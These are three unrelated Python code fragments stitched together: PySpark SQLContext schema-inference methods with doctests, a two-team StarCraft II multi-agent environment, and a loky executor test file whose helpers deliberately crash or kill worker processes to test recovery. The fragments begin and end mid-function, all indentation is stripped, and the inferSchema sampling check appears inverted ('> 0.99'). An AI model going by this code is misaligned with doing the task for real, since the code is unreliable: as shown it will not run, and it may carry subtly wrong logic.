self.scheme = None
self.results = Results()
# define layers
if isinstance(dropout, (int, float)):
dropout = (dropout,) # convert to tuple
self.dropout = dropout
self.activation = activation
self.layers = nn.ModuleList()
for d in | |
each row in the sampled dataset. Otherwise, the
first 100 rows of the RDD are inspected. Nested collections are
supported, which can include array, dict, list, Row, tuple,
namedtuple, or object.
Each row could be L{pyspark.sql.Row} object or namedtuple or objects.
Using top level dicts is deprecated, as dict is used to represent Maps.
If a single column has multiple distinct inferred types, it may cause
runtime exceptions.
>>> rdd = sc.parallelize(
... [Row(field1=1, field2="row1"),
... Row(field1=2, field2="row2"),
... Row(field1=3, field2="row3")])
>>> df = sqlCtx.inferSchema(rdd)
>>> df.collect()[0]
Row(field1=1, field2=u'row1')
>>> NestedRow = Row("f1", "f2")
>>> nestedRdd1 = sc.parallelize([
... NestedRow(array('i', [1, 2]), {"row1": 1.0}),
... NestedRow(array('i', [2, 3]), {"row2": 2.0})])
>>> df = sqlCtx.inferSchema(nestedRdd1)
>>> df.collect()
[Row(f1=[1, 2], f2={u'row1': 1.0}), ..., f2={u'row2': 2.0})]
>>> nestedRdd2 = sc.parallelize([
... NestedRow([[1, 2], [2, 3]], [1, 2]),
... NestedRow([[2, 3], [3, 4]], [2, 3])])
>>> df = sqlCtx.inferSchema(nestedRdd2)
>>> df.collect()
[Row(f1=[[1, 2], [2, 3]], f2=[1, 2]), ..., f2=[2, 3])]
>>> from collections import namedtuple
>>> CustomRow = namedtuple('CustomRow', 'field1 field2')
>>> rdd = sc.parallelize(
... [CustomRow(field1=1, field2="row1"),
... CustomRow(field1=2, field2="row2"),
... CustomRow(field1=3, field2="row3")])
>>> df = sqlCtx.inferSchema(rdd)
>>> df.collect()[0]
Row(field1=1, field2=u'row1')
"""
if isinstance(rdd, DataFrame):
raise TypeError("Cannot apply schema to DataFrame")
first = rdd.first()
if not first:
raise ValueError("The first row in RDD is empty, "
"can not infer schema")
if type(first) is dict:
warnings.warn("Using RDD of dict to inferSchema is deprecated,"
"please use pyspark.sql.Row instead")
if samplingRatio is None:
schema = _infer_schema(first)
if _has_nulltype(schema):
for row in rdd.take(100)[1:]:
schema = _merge_type(schema, _infer_schema(row))
if not _has_nulltype(schema):
break
else:
warnings.warn("Some of types cannot be determined by the "
"first 100 rows, please try again with sampling")
else:
if samplingRatio > 0.99:
rdd = rdd.sample(False, float(samplingRatio))
schema = rdd.map(_infer_schema).reduce(_merge_type)
converter = _create_converter(schema)
rdd = rdd.map(converter)
return self.applySchema(rdd, schema)
def applySchema(self, rdd, schema):
"""
Applies the given schema to the given RDD of L{tuple} or L{list}.
These tuples or lists can contain complex nested structures like
lists, maps or nested rows.
The schema should be a StructType.
It is important that the schema matches the types of the objects
in each row or exceptions could be thrown at runtime.
>>> rdd2 = sc.parallelize([(1, "row1"), (2, "row2"), (3, "row3")])
>>> schema = StructType([StructField("field1", IntegerType(), False),
... StructField("field2", StringType(), False)])
>>> df = sqlCtx.applySchema(rdd2, schema)
>>> sqlCtx.registerRDDAsTable(df, "table1")
>>> df2 = sqlCtx.sql("SELECT * from table1")
>>> df2.collect()
[Row(field1=1, field2=u'row1'),..., Row(field1=3, field2=u'row3')]
>>> from datetime import date, datetime
>>> rdd = sc.parallelize([(127, -128L, -32768, 32767, 2147483647L, 1.0,
... date(2010, 1, 1),
... datetime(2010, 1, 1, 1, 1, 1),
... {"a": 1}, (2,), [1, 2, 3], None)])
>>> schema = StructType([
... StructField("byte1", ByteType(), False),
... StructField("byte2", ByteType(), False),
... StructField("short1", ShortType(), False),
... StructField("short2", ShortType(), False),
... StructField("int", IntegerType(), False),
... StructField("float", FloatType(), False),
... StructField("date", DateType(), False),
... StructField("time", TimestampType(), False),
... StructField("map",
... MapType(StringType(), IntegerType(), False), False),
... StructField("struct",
... StructType([StructField("b", ShortType(), False)]), False),
... StructField("list", ArrayType(ByteType(), False), False),
... StructField("null", DoubleType(), True)])
>>> df = sqlCtx.applySchema(rdd, schema)
>>> results = df.map(
... lambda x: (x.byte1, x.byte2, x.short1, x.short2, x.int, x.float, x.date,
... x.time, x.map["a"], x.struct.b, x.list, x.null))
>>> results.collect()[0] # doctest: +NORMALIZE_WHITESPACE
(127, -128, -32768, 32767, 2147483647, 1.0, datetime.date(2010, 1, 1),
datetime.datetime(2010, 1, 1, 1, 1, 1), 1, 2, [1, 2, 3], None)
>>> df.registerTempTable("table2")
>>> sqlCtx.sql(
... "SELECT byte1 - 1 AS byte1, byte2 + 1 AS byte2, " +
... "short1 + 1 AS short1, short2 - 1 AS short2, int - 1 AS int, " +
... "float + 1.5 as float FROM table2").collect()
[Row(byte1=126, byte2=-127, short1=-32767, short2=32766, int=2147483646, float=2.5)]
>>> rdd = sc.parallelize([(127, -32768, 1.0,
... datetime(2010, 1, 1, 1, 1, 1),
... {"a": 1}, (2,), [1, 2, 3])])
>>> abstract = "byte short float time map{} struct(b) list[]"
>>> schema = _parse_schema_abstract(abstract)
>>> typedSchema = _infer_schema_type(rdd.first(), schema)
>>> df = sqlCtx.applySchema(rdd, typedSchema)
>>> df.collect()
[Row(byte=127, short=-32768, float=1.0, time=..., list=[1, 2, 3])]
"""
if isinstance(rdd, DataFrame):
raise TypeError("Cannot apply schema to DataFrame")
if not isinstance(schema, StructType):
raise TypeError("schema should be StructType")
# take the first few rows to verify schema
rows = rdd.take(10)
# Row() cannot been deserialized by Pyrolite
if rows and isinstance(rows[0], tuple) and rows[0].__class__.__name__ == 'Row':
rdd = rdd.map(tuple)
rows = rdd.take(10)
for row in rows:
_verify_type(row, schema)
# convert python objects to sql data
converter = _python_to_sql_converter(schema)
rdd = rdd.map(converter)
jrdd = self._jvm.SerDeUtil.toJavaArray(rdd._to_java_object_rdd())
df = self._ssql_ctx.applySchemaToPythonRDD(jrdd.rdd(), schema.json())
return DataFrame(df, self)
def registerRDDAsTable(self, rdd, tableName):
"""Registers the given RDD as a temporary table in the catalog.
Temporary tables exist only during the lifetime of this instance of
SQLContext.
>>> df = sqlCtx.inferSchema(rdd)
>>> sqlCtx.registerRDDAsTable(df, "table1")
"""
if (rdd.__class__ is DataFrame):
df = rdd._jdf
self._ssql_ctx.registerRDDAsTable(df, tableName)
else:
raise ValueError("Can only register DataFrame as table")
def parquetFile(self, path):
"""Loads a Parquet file, returning the result as a L{DataFrame}.
>>> import tempfile, shutil
>>> parquetFile = tempfile.mkdtemp()
>>> shutil.rmtree(parquetFile)
>>> df = sqlCtx.inferSchema(rdd)
>>> df.saveAsParquetFile(parquetFile)
>>> df2 = sqlCtx.parquetFile(parquetFile)
>>> sorted(df.collect()) == sorted(df2.collect())
True
"""
jdf = self._ssql_ctx.parquetFile(path)
return DataFrame(jdf, self)
def jsonFile(self, path, schema=None, samplingRatio=1.0):
"""
Loads a text file storing one JSON object per line as a
L{DataFrame}.
If the schema is provided, applies the given schema to this
JSON dataset.
Otherwise, it samples the dataset with ratio `samplingRatio` to
determine the schema.
>>> import tempfile, shutil
>>> jsonFile = tempfile.mkdtemp()
>>> shutil.rmtree(jsonFile)
>>> ofn = open(jsonFile, 'w')
>>> for json in jsonStrings:
... print>>ofn, json
>>> ofn.close()
>>> df1 = sqlCtx.jsonFile(jsonFile)
>>> sqlCtx.registerRDDAsTable(df1, "table1")
>>> df2 = sqlCtx.sql(
... "SELECT field1 AS f1, field2 as f2, field3 as f3, "
... "field6 as f4 from table1")
>>> for r in df2.collect():
... print r
Row(f1=1, f2=u'row1', f3=Row(field4=11, field5=None), f4=None)
Row(f1=2, f2=None, f3=Row(field4=22,..., f4=[Row(field7=u'row2')])
Row(f1=None, f2=u'row3', f3=Row(field4=33, field5=[]), f4=None)
>>> df3 = sqlCtx.jsonFile(jsonFile, df1.schema())
>>> sqlCtx.registerRDDAsTable(df3, "table2")
>>> df4 = sqlCtx.sql(
... "SELECT field1 AS f1, field2 as f2, field3 as f3, "
... "field6 as f4 from table2")
>>> for r in df4.collect():
... print r
Row(f1=1, f2=u'row1', f3=Row(field4=11, field5=None), f4=None)
Row(f1=2, f2=None, f3=Row(field4=22,..., f4=[Row(field7=u'row2')])
Row(f1=None, f2=u'row3', f3=Row(field4=33, field5=[]), f4=None)
>>> schema = StructType([
... StructField("field2", StringType(), True),
... StructField("field3",
... StructType([
... StructField("field5",
... ArrayType(IntegerType(), False), True)]), False)])
>>> df5 = sqlCtx.jsonFile(jsonFile, schema)
>>> sqlCtx.registerRDDAsTable(df5, "table3")
>>> df6 = sqlCtx.sql(
... "SELECT field2 AS f1, field3.field5 as f2, "
... "field3.field5[0] as f3 from table3")
>>> df6.collect()
[Row(f1=u'row1', f2=None, f3=None)...Row(f1=u'row3', f2=[], f3=None)]
"""
if schema is None:
df = self._ssql_ctx.jsonFile(path, samplingRatio)
else:
scala_datatype = self._ssql_ctx.parseDataType(schema.json())
df = self._ssql_ctx.jsonFile(path, scala_datatype)
return DataFrame(df, self)
def jsonRDD(self, rdd, schema=None, samplingRatio=1.0):
"""Loads an RDD storing one JSON object per string as a L{DataFrame}.
If the schema is provided, applies the given schema to this
JSON dataset.
Otherwise, it samples the dataset with ratio `samplingRatio` to
determine the schema.
>>> df1 = sqlCtx.jsonRDD(json)
>>> sqlCtx.registerRDDAsTable(df1, "table1")
>>> df2 = sqlCtx.sql(
... "SELECT field1 AS f1, field2 as f2, field3 as f3, "
... "field6 as f4 from table1")
>>> for r in df2.collect():
... print r
Row(f1=1, f2=u'row1', f3=Row(field4=11, field5=None), f4=None)
Row(f1=2, f2=None, f3=Row(field4=22..., f4=[Row(field7=u'row2')])
Row(f1=None, f2=u'row3', f3=Row(field4=33, field5=[]), f4=None)
>>> df3 = sqlCtx.jsonRDD(json, df1.schema())
>>> sqlCtx.registerRDDAsTable(df3, "table2")
>>> df4 = sqlCtx.sql(
... "SELECT field1 AS f1, field2 as f2, field3 as f3, "
... "field6 as f4 from table2")
>>> for r in df4.collect():
... print r
Row(f1=1, f2=u'row1', f3=Row(field4=11, field5=None), f4=None)
Row(f1=2, f2=None, f3=Row(field4=22..., f4=[Row(field7=u'row2')])
Row(f1=None, f2=u'row3', f3=Row(field4=33, field5=[]), f4=None)
>>> schema = StructType([
... StructField("field2", StringType(), True),
... StructField("field3",
... StructType([
... StructField("field5",
... ArrayType(IntegerType(), False), True)]), False)])
>>> df5 = sqlCtx.jsonRDD(json, schema)
>>> sqlCtx.registerRDDAsTable(df5, "table3")
>>> df6 = sqlCtx.sql(
... "SELECT field2 AS f1, field3.field5 as f2, "
... "field3.field5[0] as f3 from table3")
>>> df6.collect()
[Row(f1=u'row1', f2=None,...Row(f1=u'row3', f2=[], f3=None)]
>>> sqlCtx.jsonRDD(sc.parallelize(['{}',
... '{"key0": {"key1": "value1"}}'])).collect()
[Row(key0=None), Row(key0=Row(key1=u'value1'))]
>>> sqlCtx.jsonRDD(sc.parallelize(['{"key0": null}',
... '{"key0": {"key1": "value1"}}'])).collect()
[Row(key0=None), Row(key0=Row(key1=u'value1'))]
"""
def | |
<gh_stars>1-10
from smac.env.starcraft2.starcraft2 import StarCraft2Env
from smac.env.starcraft2.starcraft2 import races, difficulties, Direction
from smac.env.starcraft2.starcraft2 import actions as actions_api
from operator import attrgetter
from copy import deepcopy
import numpy as np
from absl import logging
from pysc2 import maps
from pysc2 import run_configs
from pysc2.lib import protocol, run_parallel, portspicker
from s2clientprotocol import sc2api_pb2 as sc_pb
from s2clientprotocol import raw_pb2 as r_pb
from s2clientprotocol import debug_pb2 as d_pb
class StarCraft2EnvMulti(StarCraft2Env):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.max_reward_p2 = (
self.n_agents * self.reward_death_value + self.reward_win
)
self.last_action = np.zeros(
(self.n_agents + self.n_enemies, self.n_actions))
self.team_1_heuristic = False
self.team_2_heuristic = False
self.action_error = 0
self.battles_won_team_1 = 0
self.battles_won_team_2 = 0
self.sum_rewards_team1 = 0
self.sum_rewards_team2 = 0
def _launch(self):
# Multi player, based on the implement in:
# https://github.com/deepmind/pysc2/blob/master/pysc2/env/sc2_env.py
n_players = 2
self._run_config = run_configs.get(version=self.game_version)
self.parallel = run_parallel.RunParallel()
_map = maps.get(self.map_name)
interface_options = sc_pb.InterfaceOptions(raw=True, score=False)
# Reserve a whole bunch of ports
ports = portspicker.pick_unused_ports(n_players * 2)
# Actually launch the game processes.
self._sc2_proc = [self._run_config.start(
extra_ports=ports,
window_size=self.window_size,
want_rgb=False)
for _ in range(n_players)]
self._controller = [p.controller for p in self._sc2_proc]
for c in self._controller:
c.save_map(_map.path, _map.data(self._run_config))
# Create the create request.
create = sc_pb.RequestCreateGame(
local_map=sc_pb.LocalMap(
map_path=_map.path,
map_data=self._run_config.map_data(_map.path)),
realtime=False,
random_seed=self._seed)
for _ in range(n_players):
create.player_setup.add(type=sc_pb.Participant)
self._controller[0].create_game(create)
ports_copy = ports[:]
# Create the join requests.
join_resquests = []
join = sc_pb.RequestJoinGame(race=races[self._agent_race],
options=interface_options)
join.shared_port = 0 # unused
join.server_ports.game_port = ports_copy.pop(0)
join.server_ports.base_port = ports_copy.pop(0)
for _ in range(n_players - 1):
join.client_ports.add(game_port=ports_copy.pop(0),
base_port=ports_copy.pop(0))
join_resquests.append(join)
ports_copy = ports[:]
join = sc_pb.RequestJoinGame(race=races[self._bot_race],
options=interface_options)
join.shared_port = 0 # unused
join.server_ports.game_port = ports_copy.pop(0)
join.server_ports.base_port = ports_copy.pop(0)
for _ in range(n_players - 1):
join.client_ports.add(game_port=ports_copy.pop(0),
base_port=ports_copy.pop(0))
join_resquests.append(join)
self.parallel.run((c.join_game, join__) for c, join__ in
zip(self._controller, join_resquests))
game_info = self._controller[0].game_info()
map_info = game_info.start_raw
map_play_area_min = map_info.playable_area.p0
map_play_area_max = map_info.playable_area.p1
self.max_distance_x = map_play_area_max.x - map_play_area_min.x
self.max_distance_y = map_play_area_max.y - map_play_area_min.y
self.map_x = map_info.map_size.x
self.map_y = map_info.map_size.y
self.terrain_height = np.flip(
np.transpose(np.array(list(map_info.terrain_height.data))
.reshape(self.map_x, self.map_y)), 1) / 255
if map_info.pathing_grid.bits_per_pixel == 1:
vals = np.array(list(map_info.pathing_grid.data)).reshape(
self.map_x, int(self.map_y / 8))
self.pathing_grid = np.transpose(np.array([
[(b >> i) & 1 for b in row for i in range(7, -1, -1)]
for row in vals], dtype=np.bool))
else:
self.pathing_grid = np.invert(np.flip(np.transpose(np.array(
list(map_info.pathing_grid.data), dtype=np.bool).reshape(
self.map_x, self.map_y)), axis=1))
def reset(self):
"""Reset the environment. Required after each full episode.
Returns initial observations and states.
"""
self._episode_steps = 0
if self._episode_count == 0:
# Launch StarCraft II
self._launch()
else:
self._restart()
# Information kept for counting the reward
self.death_tracker_ally = np.zeros(self.n_agents)
self.death_tracker_enemy = np.zeros(self.n_enemies)
self.previous_ally_units = None
self.previous_enemy_units = None
self.win_counted = False
self.defeat_counted = False
self.sum_rewards_team1 = 0
self.sum_rewards_team2 = 0
self.last_action = np.zeros(
(self.n_agents + self.n_enemies, self.n_actions))
try:
self._obs = []
for c in self._controller:
self._obs.append(c.observe())
self.init_units()
except (protocol.ProtocolError, protocol.ConnectionError):
self.full_restart()
if self.debug:
logging.debug("Started Episode {}"
.format(self._episode_count).center(60, "*"))
if self.log_more_stats:
self.distance_traveled_team_1 = [0 for _ in range(self.n_agents)]
self.distance_traveled_team_2 = [0 for _ in range(self.n_enemies)]
self.previous_team_1_pos = [[al_unit.pos.x, al_unit.pos.y] for
idx, al_unit
in self.agents.items()]
self.previous_team_2_pos = [[en_unit.pos.x, en_unit.pos.y] for
idx, en_unit
in self.enemies.items()]
self.attack_actions_team_1 = [0 for _ in range(self.n_agents)]
self.attack_actions_team_2 = [0 for _ in range(self.n_enemies)]
self.move_actions_team_1 = [0 for _ in range(self.n_agents)]
self.move_actions_team_2 = [0 for _ in range(self.n_enemies)]
self.stop_actions_team_1 = [0 for _ in range(self.n_agents)]
self.stop_actions_team_2 = [0 for _ in range(self.n_enemies)]
self.once_in_shoot_range_opponent_team_1 = [
[False for _ in range(self.n_enemies)]
for _ in range(self.n_agents)]
self.once_in_shoot_range_opponent_team_2 = [
[False for _ in range(self.n_agents)]
for _ in range(self.n_enemies)]
self.once_in_sight_range_opponent_team_1 = [
[False for _ in range(self.n_enemies)]
for _ in range(self.n_agents)]
self.once_in_sight_range_opponent_team_2 = [
[False for _ in range(self.n_agents)]
for _ in range(self.n_enemies)]
self.move_in_sight_range_team1 = [0 for _ in
range(self.n_agents)]
self.move_toward_in_sight_range_team1 = [
[0 for _ in range(self.n_enemies)] for _ in
range(self.n_agents)]
self.move_away_in_sight_range_team1 = [
[0 for _ in range(self.n_enemies)] for _ in
range(self.n_agents)]
self.move_in_shoot_range_team1 = [0 for _ in range(self.n_agents)]
self.move_toward_in_shoot_range_team1 = [
[0 for _ in range(self.n_enemies)] for _ in
range(self.n_agents)]
self.move_away_in_shoot_range_team1 = [
[0 for _ in range(self.n_enemies)] for _ in
range(self.n_agents)]
self.move_in_sight_range_team2 = [0 for _ in range(self.n_enemies)]
self.move_toward_in_sight_range_team2 = [
[0 for _ in range(self.n_agents)] for _ in
range(self.n_enemies)]
self.move_away_in_sight_range_team2 = [
[0 for _ in range(self.n_agents)] for _ in
range(self.n_enemies)]
self.move_in_shoot_range_team2 = [0 for _ in range(self.n_enemies)]
self.move_toward_in_shoot_range_team2 = [
[0 for _ in range(self.n_agents)] for _ in
range(self.n_enemies)]
self.move_away_in_shoot_range_team2 = [
[0 for _ in range(self.n_agents)] for _ in
range(self.n_enemies)]
return self.get_obs(), self.get_state()
def _restart(self):
"""Restart the environment by killing all units on the map.
There is a trigger in the SC2Map file, which restarts the
episode when there are no units left.
"""
try:
self._kill_all_units()
for _ in range(3):
for c in self._controller:
c.step()
except (protocol.ProtocolError, protocol.ConnectionError):
self.full_restart()
def full_restart(self):
"""Full restart. Closes the SC2 process and launches a new one. """
for p in self._sc2_proc:
p.close()
try:
self._launch()
self.force_restarts += 1
except:
self.full_restart()
def setup_heuristic(self, team_1: bool, team_2: bool):
self.team_1_heuristic = team_1
self.team_2_heuristic = team_2
def step(self, actions):
actions = [int(a) for a in actions]
if self.team_1_heuristic:
for i in range(self.n_agents):
actions[i] = self.get_heuristic_action(i)
if self.team_2_heuristic:
for i in range(self.n_enemies):
actions[self.n_agents + i] = self.get_heuristic_action(
self.n_agents + i)
if self.log_more_stats:
# count type of actions
for i in range(self.n_agents):
if actions[i] > 5:
self.attack_actions_team_1[i] += 1
elif actions[i] > 1:
self.move_actions_team_1[i] += 1
elif actions[i] == 1:
self.stop_actions_team_1[i] += 1
for i in range(self.n_enemies):
if actions[self.n_agents + i] > 5:
self.attack_actions_team_2[i] += 1
elif actions[self.n_agents + i] > 1:
self.move_actions_team_2[i] += 1
elif actions[self.n_agents + i] == 1:
self.stop_actions_team_2[i] += 1
new_pos_team_1 = []
new_pos_team_2 = []
for i in range(self.n_agents):
unit = self.get_unit_by_id(i)
new_pos_team_1.append((unit.pos.x, unit.pos.y))
for i in range(self.n_enemies):
unit = self.get_unit_by_id(self.n_agents + i)
new_pos_team_2.append((unit.pos.x, unit.pos.y))
for i in range(self.n_agents):
shoot_range = self.unit_shoot_range(i)
sight_range = self.unit_sight_range(i)
move_in_shoot_not_counted = True
move_in_sight_not_counted = True
for t_id, t_unit in self.enemies.items():
if t_unit.health > 0:
dist = self.distance(
new_pos_team_1[i][0], new_pos_team_1[i][1],
t_unit.pos.x, t_unit.pos.y
)
if dist <= shoot_range:
self.once_in_shoot_range_opponent_team_1[i][
t_id] = True
if 1 < actions[i] < 6:
if move_in_shoot_not_counted:
self.move_in_shoot_range_team1[i] += 1
move_in_shoot_not_counted = False
x_diff = new_pos_team_1[i][0] - t_unit.pos.x
y_diff = new_pos_team_1[i][1] - t_unit.pos.y
if actions[i] == 2:
# north
if y_diff < 0:
self.move_toward_in_shoot_range_team1[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team1[i][
t_id] += 1
if actions[i] == 3:
# south
if y_diff > 0:
self.move_toward_in_shoot_range_team1[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team1[i][
t_id] += 1
if actions[i] == 4:
# east
if x_diff < 0:
self.move_toward_in_shoot_range_team1[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team1[i][
t_id] += 1
if actions[i] == 5:
# west
if x_diff > 0:
self.move_toward_in_shoot_range_team1[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team1[i][
t_id] += 1
elif dist <= sight_range:
self.once_in_sight_range_opponent_team_1[i][
t_id] = True
if 1 < actions[i] < 6:
if move_in_sight_not_counted:
self.move_in_sight_range_team1[i] += 1
move_in_sight_not_counted = False
x_diff = new_pos_team_1[i][0] - t_unit.pos.x
y_diff = new_pos_team_1[i][1] - t_unit.pos.y
if actions[i] == 2:
# north
if y_diff < 0:
self.move_toward_in_sight_range_team1[
i][t_id] += 1
else:
self.move_away_in_sight_range_team1[i][
t_id] += 1
if actions[i] == 3:
# south
if y_diff > 0:
self.move_toward_in_sight_range_team1[
i][t_id] += 1
else:
self.move_away_in_sight_range_team1[i][
t_id] += 1
if actions[i] == 4:
# east
if x_diff < 0:
self.move_toward_in_sight_range_team1[
i][t_id] += 1
else:
self.move_away_in_sight_range_team1[i][
t_id] += 1
if actions[i] == 5:
# west
if x_diff > 0:
self.move_toward_in_sight_range_team1[
i][t_id] += 1
else:
self.move_away_in_sight_range_team1[i][
t_id] += 1
for i in range(self.n_enemies):
shoot_range = self.unit_shoot_range(self.n_agents + i)
sight_range = self.unit_sight_range(self.n_agents + i)
move_in_shoot_not_counted = True
move_in_sight_not_counted = True
action__ = actions[self.n_agents + i]
for t_id, t_unit in self.agents.items():
if t_unit.health > 0:
dist = self.distance(
new_pos_team_2[i][0], new_pos_team_2[i][1],
t_unit.pos.x, t_unit.pos.y
)
if dist <= shoot_range:
self.once_in_shoot_range_opponent_team_2[i][
t_id] = True
if 1 < action__ < 6:
if move_in_shoot_not_counted:
self.move_in_shoot_range_team2[i] += 1
move_in_shoot_not_counted = False
x_diff = new_pos_team_2[i][0] - t_unit.pos.x
y_diff = new_pos_team_2[i][1] - t_unit.pos.y
if action__ == 2:
# north
if y_diff < 0:
self.move_toward_in_shoot_range_team2[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team2[i][
t_id] += 1
if action__ == 3:
# south
if y_diff > 0:
self.move_toward_in_shoot_range_team2[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team2[i][
t_id] += 1
if action__ == 4:
# east
if x_diff < 0:
self.move_toward_in_shoot_range_team2[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team2[i][
t_id] += 1
if action__ == 5:
# west
if x_diff > 0:
self.move_toward_in_shoot_range_team2[
i][t_id] += 1
else:
self.move_away_in_shoot_range_team2[i][
t_id] += 1
elif | |
<gh_stars>100-1000
import os
import sys
import gc
import ctypes
import psutil
import pytest
import warnings
import threading
from time import sleep
from multiprocessing import util, current_process
from pickle import PicklingError, UnpicklingError
from distutils.version import LooseVersion
import loky
from loky import cpu_count
from loky import get_reusable_executor
from loky.process_executor import _RemoteTraceback, TerminatedWorkerError
from loky.process_executor import BrokenProcessPool, ShutdownExecutorError
from loky.reusable_executor import _ReusablePoolExecutor
import cloudpickle
from ._executor_mixin import ReusableExecutorMixin
from .utils import TimingWrapper, id_sleep, check_python_subprocess_call
from .utils import filter_match
cloudpickle_version = LooseVersion(cloudpickle.__version__)
# Compat windows
if sys.platform == "win32":
from signal import SIGTERM as SIGKILL
libc = ctypes.cdll.msvcrt
else:
from signal import SIGKILL
from ctypes.util import find_library
libc = ctypes.CDLL(find_library("c"))
try:
import numpy as np
except ImportError:
np = None
# Backward compat for python2 cPickle module
PICKLING_ERRORS = (PicklingError,)
try:
import cPickle
PICKLING_ERRORS += (cPickle.PicklingError,)
except ImportError:
pass
def clean_warning_registry():
"""Safe way to reset warnings."""
warnings.resetwarnings()
reg = "__warningregistry__"
for mod_name, mod in list(sys.modules.items()):
if hasattr(mod, reg):
getattr(mod, reg).clear()
def wait_dead(worker, n_tries=1000, delay=0.001):
"""Wait for process pid to die"""
for i in range(n_tries):
if worker.exitcode is not None:
return
sleep(delay)
raise RuntimeError("Process %d failed to die for at least %0.3fs" %
(worker.pid, delay * n_tries))
def crash():
"""Induces a segfault"""
import faulthandler
faulthandler._sigsegv()
def exit():
"""Induces a sys exit with exitcode 0"""
sys.exit(0)
def c_exit(exitcode=0):
"""Induces a libc exit with exitcode 0"""
libc.exit(exitcode)
def sleep_then_check_pids_exist(arg):
"""Sleep for some time and the check if all the passed pids exist"""
time, pids = arg
sleep(time)
res = True
for p in pids:
res &= psutil.pid_exists(p)
return res
def kill_friend(pid, delay=0):
"""Function that send SIGKILL at process pid"""
sleep(delay)
try:
os.kill(pid, SIGKILL)
except (PermissionError, ProcessLookupError) as e:
if psutil.pid_exists(pid):
util.debug("Fail to kill an alive process?!?")
raise e
util.debug("process {} was already dead".format(pid))
def raise_error(etype=UnpicklingError, message=None):
"""Function that raises an Exception in process"""
raise etype(message)
def return_instance(cls):
"""Function that returns a instance of cls"""
return cls()
class SayWhenError(ValueError):
pass
def exception_throwing_generator(total, when):
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
def do_nothing(arg):
"""Function that return True, test passing argument"""
return True
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return exit, ()
class CExitAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
c_exit()
class CExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return c_exit, ()
class ErrorAtPickle(object):
"""Bad object that raises an error at pickling time."""
def __init__(self, fail=True):
self.fail = fail
def __reduce__(self):
if self.fail:
raise PicklingError("Error in pickle")
else:
return id, (42, )
class ErrorAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __init__(self, etype=UnpicklingError, message='the error message'):
self.etype = etype
self.message = message
def __reduce__(self):
return raise_error, (self.etype, self.message)
class CrashAtGCInWorker(object):
"""Bad object that triggers a segfault at call item GC time"""
def __del__(self):
if current_process().name != "MainProcess":
crash()
class CExitAtGCInWorker(object):
"""Exit worker at call item GC time"""
def __del__(self):
if current_process().name != "MainProcess":
c_exit()
class TestExecutorDeadLock(ReusableExecutorMixin):
crash_cases = [
# Check problem occuring while pickling a task in
(id, (ExitAtPickle(),), PicklingError, None),
(id, (ErrorAtPickle(),), PicklingError, None),
# Check problem occuring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool, r"SystemExit"),
(id, (CExitAtUnpickle(),), TerminatedWorkerError, r"EXIT\(0\)"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool, r"UnpicklingError"),
(id, (CrashAtUnpickle(),), TerminatedWorkerError, r"SIGSEGV"),
# Check problem occuring during function execution on workers
(crash, (), TerminatedWorkerError, r"SIGSEGV"),
(exit, (), SystemExit, None),
(c_exit, (), TerminatedWorkerError, r"EXIT\(0\)"),
(raise_error, (RuntimeError,), RuntimeError, None),
# Check problem occuring while pickling a task result
# on workers
(return_instance, (CrashAtPickle,), TerminatedWorkerError, r"SIGSEGV"),
(return_instance, (ExitAtPickle,), SystemExit, None),
(return_instance, (CExitAtPickle,), TerminatedWorkerError,
r"EXIT\(0\)"),
(return_instance, (ErrorAtPickle,), PicklingError, None),
# Check problem occuring while unpickling a task in
# the result_handler thread
(return_instance, (ExitAtUnpickle,), BrokenProcessPool, r"SystemExit"),
(return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
r"UnpicklingError"),
]
@pytest.mark.parametrize("func, args, expected_err, match", crash_cases)
def test_crashes(self, func, args, expected_err, match):
"""Test various reusable_executor crash handling"""
executor = get_reusable_executor(max_workers=2)
res = executor.submit(func, *args)
match_err = None
if expected_err is TerminatedWorkerError:
match_err = filter_match(match)
match = None
with pytest.raises(expected_err, match=match_err) as exc_info:
res.result()
# For remote traceback, ensure that the cause contains the original
# error
if match is not None:
with pytest.raises(_RemoteTraceback, match=match):
raise exc_info.value.__cause__
@pytest.mark.parametrize("func, args, expected_err, match", crash_cases)
def test_in_callback_submit_with_crash(self, func, args, expected_err,
match):
"""Test the recovery from callback crash"""
executor = get_reusable_executor(max_workers=2, timeout=12)
def in_callback_submit(future):
future2 = get_reusable_executor(
max_workers=2, timeout=12).submit(func, *args)
# Store the future of the job submitted in the callback to make it
# easy to introspect.
future.callback_future = future2
future.callback_done.set()
# Make sure the first submitted job last a bit to make sure that
# the callback will be called in the queue manager thread and not
# immediately in the main thread.
delay = 0.1
f = executor.submit(id_sleep, 42, delay)
f.callback_done = threading.Event()
f.add_done_callback(in_callback_submit)
assert f.result() == 42
if not f.callback_done.wait(timeout=3):
raise AssertionError('callback not done before timeout')
match_err = None
if expected_err is TerminatedWorkerError:
match_err = filter_match(match)
match = None
with pytest.raises(expected_err, match=match_err) as exc_info:
f.callback_future.result()
# For remote traceback, ensure that the cause contains the original
# error
if match is not None:
with pytest.raises(_RemoteTraceback, match=match):
raise exc_info.value.__cause__
def test_callback_crash_on_submit(self):
"""Errors in the callback execution directly in queue manager thread.
This case can break the process executor and we want to make sure
that we can detect the issue and recover by calling
get_reusable_executor.
"""
executor = get_reusable_executor(max_workers=2)
# Make sure the first submitted job last a bit to make sure that
# the callback will be called in the queue manager thread and not
# immediately in the main thread.
delay = 0.1
